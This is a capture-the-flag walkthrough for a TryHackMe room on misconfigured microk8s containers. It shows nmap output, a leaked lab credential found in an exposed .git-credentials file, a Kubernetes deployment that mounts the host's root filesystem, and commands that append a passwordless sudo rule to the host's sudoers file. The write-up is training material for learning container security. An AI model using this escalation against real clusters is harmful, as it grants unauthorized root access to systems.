
[Frank & Herby Make an App] - TryHackMe - Walkthrough
A guide to the TryHackMe room [Frank & Herby Make an App]
Learn how the misconfiguration of containers can lead to opportunities for some and disasters for others.
Nmap scan report for 10.10.2.161
Host is up, received reset ttl 61 (0.097s latency).
Scanned at 2022-05-20 01:37:14 EDT for 28s
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 61 OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 64:79:10:0d:72:67:23:80:4a:1a:35:8e:0b:ec:a1:89 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDVZVdzBeNozVqMBvkqTgoMzE1gZdDq9qQo80NRBAbAuwgemIowsSpVnbn98CQIoxjAQ/zbyqu05qDnosP2MVXSwpgFr+D6Wk6nkB2pWSzCwdHsBuNxNkU3RNv9dPb4S1wUNlMOpGhEpyNo50zslBnQN7kz7ZPRHET37+q1aySu2WU9UlvRdsN6ouqoQyH06UGFza0X21wPKmhwG4IjxtSbG0ST5Gi3TBUNs3r4LlmvcY0OgCCpAwjCxjl8V2a/FB/SH9Tg6a3fc815tWaN028nbXMHOvyBW+kW3ETvp5pR+IGBHGXIs0zJhJV/FZSBVRkLF5p53LDrq0eCL+b2yjVLl5keOZPJU2T6encsjkMZB3ynJLqYuojIDYSDzvBVdZFQNFNKIVd67o8yX/J27PusXiXBmVwkk/ZfXaEqzURkDg4car1cV5WOJIRIHxz9V+TZ/OC10er/iBppNrzjmpCJXzzey21OoTpLZ3GyEL2s+07TPxHb3HOwupQKZ1y2i4c=
| 256 3b:0e:e7:e9:a5:1a:e4:c5:c7:88:0d:fe:ee:ac:95:65 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNX+QRguEL4oz+kogQzTSjnw/avVHwIvCK4QwTJmettBooLnWqE3JafmjtuKXJiGKe+8f0v6wYbLnwM2fy4EcSo=
| 256 d8:a7:16:75:a7:1b:26:5c:a9:2e:3f:ac:c0:ed:da:5c (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIM5D29NgPRAP6UHvWfviHmkXUvTGAk9r2c+JcknWvle7
3000/tcp open ppp? syn-ack ttl 61
| fingerprint-strings:
| GetRequest:
| HTTP/1.1 200 OK
| X-XSS-Protection: 1
| X-Content-Type-Options: nosniff
| X-Frame-Options: sameorigin
| Content-Security-Policy: default-src 'self' ; connect-src *; font-src 'self' data:; frame-src *; img-src * data:; media-src * data:; script-src 'self' 'unsafe-eval' ; style-src 'self' 'unsafe-inline'
| X-Instance-ID: 9s5xKsmLBvYEiMi5u
| Content-Type: text/html; charset=utf-8
| Vary: Accept-Encoding
| Date: Fri, 20 May 2022 05:37:27 GMT
| Connection: close
| <!DOCTYPE html>
| <html>
| <head>
| <link rel="stylesheet" type="text/css" class="__meteor-css__" href="/a3e89fa2bdd3f98d52e474085bb1d61f99c0684d.css?meteor_css_resource=true">
| <meta charset="utf-8" />
| <meta http-equiv="content-type" content="text/html; charset=utf-8" />
| <meta http-equiv="expires" content="-1" />
| <meta http-equiv="X-UA-Compatible" content="IE=edge" />
| <meta name="fragment" content="!" />
| <meta name="distribution" content
| HTTPOptions:
| HTTP/1.1 200 OK
| X-XSS-Protection: 1
| X-Content-Type-Options: nosniff
| X-Frame-Options: sameorigin
| Content-Security-Policy: default-src 'self' ; connect-src *; font-src 'self' data:; frame-src *; img-src * data:; media-src * data:; script-src 'self' 'unsafe-eval' ; style-src 'self' 'unsafe-inline'
| X-Instance-ID: 9s5xKsmLBvYEiMi5u
| Content-Type: text/html; charset=utf-8
| Vary: Accept-Encoding
| Date: Fri, 20 May 2022 05:37:28 GMT
| Connection: close
| <!DOCTYPE html>
| <html>
| <head>
| <link rel="stylesheet" type="text/css" class="__meteor-css__" href="/a3e89fa2bdd3f98d52e474085bb1d61f99c0684d.css?meteor_css_resource=true">
| <meta charset="utf-8" />
| <meta http-equiv="content-type" content="text/html; charset=utf-8" />
| <meta http-equiv="expires" content="-1" />
| <meta http-equiv="X-UA-Compatible" content="IE=edge" />
| <meta name="fragment" content="!" />
|_ <meta name="distribution" content
31337/tcp open http syn-ack ttl 60 nginx 1.21.3
|_http-title: Heroic Features - Start Bootstrap Template
|_http-server-header: nginx/1.21.3
| http-methods:
|_ Supported Methods: GET HEAD
Here we can see there's a web server running on port 31337. Browsing to this port confirms it's the port Question 1 is referring to. Now we continue to enumerate, we know we're looking for a hidden file or directory from the context clue the answer in Question 2 starts with a '.' Breaking out any decent brute force tool discovers the hidden file ".git-credentials" and we have the answer to Question 2.

The contents of '.git-credentials' is 'http://frank:f%40an3-1s-E337%21%21@192.168.100.10/' note that a portion of the user frank's password is URL enoded.. decoding that reveals the username 'frank' and the password 'f@an3-1s-E337!!'
This happens to be the SSH credentials as well, so the user flag is waiting for us immediately. Simply run cat user.txt
Now its time to pop root on this machine and get the hell out of here. If you notice, the entire theme was supposed to be Kubernetes.. so, eventually you'll find a template for kubernetes kubes in frank's folder /home/frank/repos/dk-ml/test.yaml Like docker containers, we can use Kubernetes containers to mount back onto our machine with root privileges and escalate ourselves. Here's how you'd modify this test.yaml template to do just that.
/home/frank/repos/ml-d/test.yaml:
apiVersion: apps/v1
kind: Deployment
metadata:
name: exploit
labels:
app: nginx
spec:
replicas: 1
selector:
matchLabels:
app: nginx
template:
metadata:
labels:
app: nginx
spec:
containers:
- name: nginx
volumeMounts:
- name: local-stuff
mountPath: /opt/root
image: localhost:32000/bsnginx
ports:
- containerPort: 80
command:
- "/bin/bash"
- "-c"
- "sleep 10000"
volumes:
- name: local-stuff
hostPath:
path: /
type: Directory
Other than the obvious command, note that we change the mount path here. Now run these commands:
Deploy a container using the template:
microk8s kubectl apply -f test.yaml
List the pods to make sure the pod has finished spinning up:
microk8s kubectl get pod
One you see it, go ahead and jump into the pod:
microk8s kubectl exec -it <our_malicious_pod> /bin/bash
Now remember we mounted the harddrive in /opt/root, so jump on over to /opt/root/etc:
cd /opt/root/etc
And we don't have the most common editors so lets pollute the sudoers file for the frank user:
echo "frank ALL=(ALL:ALL) NOPASSWD: ALL" >> sudoers
Now just exit out of the pod, back onto the host and run sudo su - and welcome to root, dear friends. Go ahead and read the root flag. Happy Hacking!
Ask 1 Frank & Herb Make an App!
Make sure to wait 5 minutes after the machine starts up before starting recon.
Containers are really cool, but they have security considerations just like everything else. Break into the box and then figure out how to get root access!
This box will require some research into how to use microk8s.
Our story so far....
Two developers are venturing into the world of Kubernetes. Little do these developers know that their lack of understanding in 'k8s', containers, and git has left their resources open to exploitation!
Answer the questions below
What did frank leave exposed on the site?
What is the user.txt flag?
What is the root.txt flag?
Comments